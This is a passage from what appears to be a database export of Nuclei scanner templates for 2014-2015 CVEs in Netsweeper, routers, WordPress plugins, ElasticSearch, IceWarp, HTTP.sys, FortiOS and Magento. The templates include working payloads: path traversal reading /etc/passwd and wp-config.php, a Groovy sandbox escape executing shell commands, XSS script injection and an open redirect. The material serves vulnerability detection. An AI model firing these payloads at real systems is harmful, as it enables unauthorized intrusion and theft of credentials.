1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname='\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100afdf2fdb6e0145b27c1806b74b05004660dd804acc398f60bd9721b973b0a87002205e93a7b347f6ed674908692a1a6427dd067c9e72cd4c40ed43ea901641042ad7:922c64590222798bb761d5b6d8e72950", "hash": "2d0c85287736b02d856a04089f06825c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f37" }, "name": "CVE-2014-9617.yaml", "content": "id: CVE-2014-9617\n\ninfo:\n name: Netsweeper 3.0.6 - Open Redirection\n author: daffainfo\n severity: medium\n description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing 
attacks via a URL in the url parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9617\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9617\n cwe-id: CWE-601\n epss-score: 0.00109\n epss-percentile: 0.43869\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,redirect,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950", "hash": "d0e33d2fb15ba6a069755f5732994bae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f38" }, "name": "CVE-2014-9618.yaml", "content": "id: CVE-2014-9618\n\ninfo:\n name: Netsweeper - Authentication Bypass\n author: daffainfo\n severity: critical\n description: |\n The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a 
showdeny action to the default URL.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9618\n - https://www.exploit-db.com/exploits/37933/\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-9618\n cwe-id: CWE-287\n epss-score: 0.03433\n epss-percentile: 0.90527\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"'\n - 'placeholder=\"Profile Manager\">'\n - 'Netsweeper WebAdmin'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950", "hash": "704e9bf6b20af19c0d7d62b68d607782", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f39" }, "name": "CVE-2015-0554.yaml", "content": "id: CVE-2015-0554\n\ninfo:\n name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure\n author: daffainfo\n severity: critical\n description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with 
firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/35721\n - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-0554\n - http://www.exploit-db.com/exploits/35721\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C\n cvss-score: 9.4\n cve-id: CVE-2015-0554\n cwe-id: CWE-264\n epss-score: 0.0139\n epss-percentile: 0.86079\n cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adb\n product: p.dga4001n_firmware\n tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wlsecurity.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var wpapskkey\"\n - \"var WscDevPin\"\n - \"var sessionkey\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022000e916dda30ee40dc5bdad6723685045a740d238b72ba35fb08f356767409e0f02207ed3256489eeb84f8776c5b31fe38cd30bc00b5e06645fb8e739a43040b27594:922c64590222798bb761d5b6d8e72950", "hash": "e47b331eea3567f9bd6d17c228027509", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3a" }, "name": "CVE-2015-1000005.yaml", "content": "id: CVE-2015-1000005\n\ninfo:\n name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion\n author: dhiyaneshDK\n severity: 
high\n description: |\n WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of the plugin.\n reference:\n - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005\n - http://www.vapidlabs.com/advisory.php?v=142\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000005\n cwe-id: CWE-22\n epss-score: 0.047\n epss-percentile: 0.92455\n cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: candidate-application-form_project\n product: candidate-application-form\n framework: wordpress\n tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950", "hash": "7c0c01653105e6962a2196f2f2b1729e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3b" }, "name": "CVE-2015-1000010.yaml", "content": "id: CVE-2015-1000010\n\ninfo:\n name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion\n author: dhiyaneshDK\n severity: high\n description: |\n WordPress Simple Image 
Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Update to the latest version of the WordPress Simple Image Manipulator plugin.\n reference:\n - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html\n - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010\n - http://www.vapidlabs.com/advisory.php?v=147\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000010\n cwe-id: CWE-284\n epss-score: 0.03171\n epss-percentile: 0.90143\n cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: simple-image-manipulator_project\n product: simple-image-manipulator\n framework: wordpress\n tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204897681607efd5efa7419b4414d554d537b647ee8f3b82b28b5eb82cbf6b94780220070696d15d7aa49a984ce8ead0fd4ccbaa176cc380998024f33878546e311041:922c64590222798bb761d5b6d8e72950", "hash": "e777216dc040969428eb3a1223d857f9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3c" }, "name": "CVE-2015-1000012.yaml", "content": "id: CVE-2015-1000012\n\ninfo:\n name: WordPress MyPixs <=0.3 - Local File Inclusion\n author: daffainfo\n severity: high\n description: 
WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server.\n remediation: |\n Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability.\n reference:\n - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012\n - http://www.vapidlabs.com/advisory.php?v=154\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000012\n cwe-id: CWE-200\n epss-score: 0.00689\n epss-percentile: 0.79673\n cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mypixs_project\n product: mypixs\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/mypixs\"\n tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059a1c4530f87d483652235366963039a278c43e8017648b5e66c1ded53ac1bea0220103c20d421e6f063c7939b78129fffefe71a58c02ec2905ef3b31d3a3d9f29e1:922c64590222798bb761d5b6d8e72950", "hash": "085fb8f34cff4ecd8667f6f5d0ba32ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3d" }, "name": "CVE-2015-1427.yaml", "content": "id: CVE-2015-1427\n\ninfo:\n name: ElasticSearch - Remote Code Execution\n author: pikpikcu\n severity: high\n description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox 
protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by ElasticSearch to fix the Groovy sandbox bypass vulnerability.\n reference:\n - https://blog.csdn.net/JiangBuLiu/article/details/94457980\n - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1427\n - http://packetstormsecurity.com/files/130368/Elasticsearch-1.3.7-1.4.2-Sandbox-Escape-Command-Execution.html\n - https://access.redhat.com/errata/RHSA-2017:0868\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-1427\n cwe-id: CWE-284\n epss-score: 0.85974\n epss-percentile: 0.98485\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev\n\nhttp:\n - raw:\n - |\n POST /website/blog/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"name\": \"test\"\n }\n - |\n POST /_search HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n {\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950", "hash": "82c10f636a245b70f2e29536b86f1566", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3e" }, "name": "CVE-2015-1503.yaml", "content": "id: CVE-2015-1503\n\ninfo:\n name: IceWarp Mail Server <11.1.1 - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html\n - http://www.icewarp.com\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1503\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1503\n cwe-id: CWE-22\n epss-score: 0.90421\n epss-percentile: 0.98743\n cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: icewarp\n product: mail_server\n shodan-query: title:\"icewarp\"\n tags: cve2015,cve,lfi,mail,packetstorm,icewarp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd\"\n - \"{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd\"\n\n 
matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950", "hash": "9b3fe0eee1b35f92511c3d23fc3c24e0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3f" }, "name": "CVE-2015-1579.yaml", "content": "id: CVE-2015-1579\n\ninfo:\n name: WordPress Slider Revolution - Local File Disclosure\n author: pussycat0x\n severity: medium\n description: |\n Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n impact: |\n An attacker can read arbitrary files on the server, potentially exposing sensitive information.\n remediation: |\n Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.\n reference:\n - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html\n - https://cxsecurity.com/issue/WLB-2021090129\n - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1579\n - https://wpvulndb.com/vulnerabilities/7540\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-1579\n cwe-id: CWE-22\n epss-score: 0.90145\n epss-percentile: 0.9855\n cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: elegant_themes\n product: divi\n framework: wordpress\n google-query: inurl:/wp-content/plugins/revslider\n tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'\n - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'DB_NAME'\"\n - \"'DB_PASSWORD'\"\n - \"'DB_USER'\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950", "hash": "6cf8d2c98dee3087fc421b0946a9ca9f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f40" }, "name": "CVE-2015-1635.yaml", "content": "id: CVE-2015-1635\n\ninfo:\n name: Microsoft Windows 'HTTP.sys' - Remote Code Execution\n author: Phillipo\n severity: critical\n description: |\n HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n reference:\n - https://www.exploit-db.com/exploits/36773\n - https://www.securitysift.com/an-analysis-of-ms15-034/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1635\n - http://www.securitytracker.com/id/1032109\n - https://github.com/b1gbroth3r/shoMe\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2015-1635\n cwe-id: CWE-94\n epss-score: 0.97537\n epss-percentile: 0.99992\n cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microsoft\n product: windows_7\n shodan-query: '\"Microsoft-IIS\" \"2015\"'\n tags: cve,cve2015,kev,microsoft,iis,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n headers:\n Range: \"bytes=0-18446744073709551615\"\n\n matchers-condition: and\n matchers:\n - type: 
word\n part: body\n words:\n - \"HTTP Error 416\"\n - \"The requested range is not satisfiable\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"Microsoft\"\n# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950", "hash": "053dfa5e3504286c451c320f1dd9361c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f41" }, "name": "CVE-2015-1880.yaml", "content": "id: CVE-2015-1880\n\ninfo:\n name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability.\n reference:\n - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page\n - http://www.fortiguard.com/advisory/FG-IR-15-005/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1880\n - http://www.securitytracker.com/id/1032261\n - http://www.securitytracker.com/id/1032262\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-1880\n cwe-id: CWE-79\n epss-score: 0.00201\n epss-percentile: 0.57435\n cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fortinet\n product: fortios\n tags: cve2015,cve,xss,fortigates,intrusive,fortinet\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950", "hash": "4817a96454db3bf0a19b0e315c65fdf0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f42" }, "name": "CVE-2015-20067.yaml", "content": "id: CVE-2015-20067\n\ninfo:\n name: WP Attachment Export < 0.2.4 - Unrestricted File Download\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\n powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n remediation: Fixed in 0.2.4\n reference:\n - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a\n - https://packetstormsecurity.com/files/132693/\n - https://seclists.org/fulldisclosure/2015/Jul/73\n - https://nvd.nist.gov/vuln/detail/CVE-2015-20067\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-20067\n cwe-id: CWE-862\n epss-score: 0.07226\n epss-percentile: 0.93884\n cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp_attachment_export_project\n product: wp_attachment_export\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-attachment-export/\"\n tags: 
wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true\"\n - \"{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"text/xml\")'\n - 'contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")'\n condition: and\n# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950", "hash": "2f123d2d1ab2b6ad592b2598d0f72d65", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f43" }, "name": "CVE-2015-2067.yaml", "content": "id: CVE-2015-2067\n\ninfo:\n name: Magento Server MAGMI - Directory Traversal\n author: daffainfo\n severity: medium\n description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. 
(dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Apply the latest security patches and updates provided by Magento.\n reference:\n - https://www.exploit-db.com/exploits/35996\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2067\n - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-2067\n cwe-id: CWE-22\n epss-score: 0.00709\n epss-percentile: 0.79991\n cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*\n metadata:\n max-request: 1\n vendor: magmi_project\n product: magmi\n framework: magento_server\n shodan-query: http.component:\"Magento\"\n tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950", "hash": "3d17f92f8f3aad92ebeb487c86f6638f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f44" }, "name": "CVE-2015-2068.yaml", "content": "id: CVE-2015-2068\n\ninfo:\n name: Magento Server Mass Importer - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or 
(2) QUERY_STRING to web/magmi_import_run.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.\n remediation: |\n Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.\n reference:\n - https://www.exploit-db.com/exploits/35996\n - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2068\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-2068\n cwe-id: CWE-79\n epss-score: 0.00146\n epss-percentile: 0.4958\n cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: magmi_project\n product: magmi\n framework: magento_server\n shodan-query: http.component:\"Magento\"\n tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server\n\nhttp:\n - method: GET\n path:\n - 